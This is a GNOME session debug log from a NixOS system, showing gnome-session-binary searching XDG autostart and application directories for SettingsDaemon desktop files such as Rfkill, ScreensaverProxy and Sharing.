machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
